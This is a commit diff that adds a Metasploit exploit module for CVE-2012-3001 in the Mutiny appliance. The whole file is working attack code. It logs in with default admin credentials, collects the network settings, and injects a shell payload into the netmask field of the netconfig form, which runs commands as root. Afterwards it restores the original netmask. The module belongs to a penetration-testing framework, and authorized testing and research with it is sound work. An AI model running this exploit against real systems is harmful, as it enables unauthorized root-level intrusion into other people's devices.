added module for cve-2012-3001

modules/exploits/unix/webapp/mutiny_subnetmask_exec.rb

@@ -0,0 +1,157 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Mutiny Remote Command Execution',
+			'Description'    => %q{
+					This module exploits an authenticated command injection vulnerability in the
+				Mutiny appliance. Versions prior to 4.5-1.12 are vulnerable. In order to exploit
+				the vulnerability the mutiny user must have access to the admin interface. The
+				injected commands are executed with root privileges. This module has been tested
+				successfully on Mutiny 4.2-1.05.
+			},
+			'Author'         =>
+				[
+					'Christopher Campbell', # Vulnerability discovery
+					'juan vazquez'          # Metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					['CVE', '2012-3001'],
+					['OSVDB', '86570'],
+					['BID', '56165'],
+					['US-CERT-VU', '841851'],
+					['URL', 'http://obscuresecurity.blogspot.com.es/2012/10/mutiny-command-injection-and-cve-2012.html']
+				],
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Space'       => 4000,
+					'Compat'      =>
+						{
+							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'generic python',
+						}
+				},
+			'Platform'       => 'unix',
+			'Arch'           => ARCH_CMD,
+			'Targets'        => [[ 'Automatic', { }]],
+			'DisclosureDate' => 'Oct 22 2012',
+			'DefaultTarget' => 0))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [ true, 'The base path to Mutiny', '/interface/' ]),
+				OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),
+				OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'mutiny' ])
+			], self.class)
+	end
+
+	def peer
+		"#{rhost}:#{rport}"
+	end
+
+	def on_new_session(session)
+		return unless @netmask_eth0
+		print_status("#{peer} - Restoring Network information")
+		cmds = [
+			%Q|echo #{@netmask_eth0} > /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask|,
+			%Q|tr -d "\\n\\r" < /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask > /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask.bak|,
+			%Q|mv -f /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask.bak /opt/MUTINYJAVA/nemobjects/config/interface/eth0/0/netmask|,
+			%Q|sed -e s/NETMASK=.*/NETMASK=#{@netmask_eth0}/ ifcfg-eth0 > ifcfg-eth0.bak|,
+			%Q|mv -f ifcfg-eth0.bak ifcfg-eth0|,
+			%Q|/etc/init.d/network restart|
+		]
+		session.shell_command_token(cmds.join(" ; "))
+		print_good("#{peer} - Network information restored")
+	end
+
+	def check
+		res = send_request_cgi({
+			'uri' => normalize_uri(target_uri.path, 'logon.jsp'),
+		})
+
+		if res and res.body =~ /: Mutiny : Login @ mutiny/
+			return Exploit::CheckCode::Detected
+		end
+
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+
+		print_status("#{peer} - Login with the provided credentials...")
+
+		res = send_request_cgi({
+			'method'    => 'POST',
+			'uri'       => normalize_uri(target_uri.path, 'logon.do'),
+			'vars_post' =>
+			{
+				'username' => datastore['USERNAME'],
+				'password' => datastore['PASSWORD']
+			}
+		})
+
+		if res and res.code == 302 and res.headers['Location'] =~ /index.do/ and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/
+			print_good("#{peer} - Login successful")
+			session = $1
+		else
+			fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to login in Mutiny")
+		end
+
+		print_status("#{peer} - Leaking current Network Information...")
+
+		res = send_request_cgi({
+			'method'    => 'GET',
+			'uri'       => normalize_uri(target_uri.path, 'admin', 'cgi-bin', 'netconfig'),
+			'cookie'    => "JSESSIONID=#{session}",
+		})
+
+		if res and res.code == 200 and res.body =~ /Ethernet Interfaces/
+			adress_eth0 = (res.body =~ /<input type="text" value="(.*)" name="addresseth0" class="textInput" \/>/ ? $1 : "")
+			@netmask_eth0 = (res.body =~ /<input type="text" value="(.*)" name="netmasketh0" class="textInput" \/>/ ? $1 : "")
+			gateway = (res.body =~ /<input type="text" name="Gateway" value= "(.*)" class="textInput">/ ? $1 : "")
+			dns_address = (res.body =~ /<input type="text" value="(.*)" name="dnsaddress0" class="textInput">/ ? $1 : "")
+			static_route_address = (res.body =~ /<input class="textInput" type="text" name="staticRouteAddress" value="(.*)" \/>/ ? $1 : "")
+			static_route_netmask = (res.body =~ /<input class="textInput" type="text" name="staticRouteNetmask" value="(.*)" \/>/ ? $1 : "")
+			static_route_gateway = (res.body =~ /<input class="textInput" type="text" name="staticRouteGateway" value="(.*)" \/>/ ? $1 : "")
+			print_good("#{peer} - Information leaked successfully")
+		else
+			print_error("#{peer} - Error leaking information, trying to exploit with random values")
+		end
+
+		print_status("#{peer} - Exploiting Command Injection...")
+		injection = @netmask_eth0.dup || rand_text_alpha(5 + rand(3))
+		injection << "; #{payload.encoded}"
+		send_request_cgi({
+			'method'    => 'POST',
+			'uri'       => normalize_uri(target_uri.path, 'admin', 'cgi-bin', 'netconfig'),
+			'cookie'    => "JSESSIONID=#{session}",
+			'vars_post' =>
+			{
+				"addresseth0" => adress_eth0 || rand_text_alpha(5 + rand(3)),
+				"netmasketh0" => injection,
+				"Gateway" => gateway || rand_text_alpha(5 + rand(3)),
+				"dnsaddress0" => dns_address || rand_text_alpha(5 + rand(3)),
+				"staticRouteAddress" => static_route_address || rand_text_alpha(5 + rand(3)),
+				"staticRouteNetmask" => static_route_netmask || rand_text_alpha(5 + rand(3)),
+				"staticRouteGateway" => static_route_gateway || rand_text_alpha(5 + rand(3))
+			}
+		})
+	end
+
+end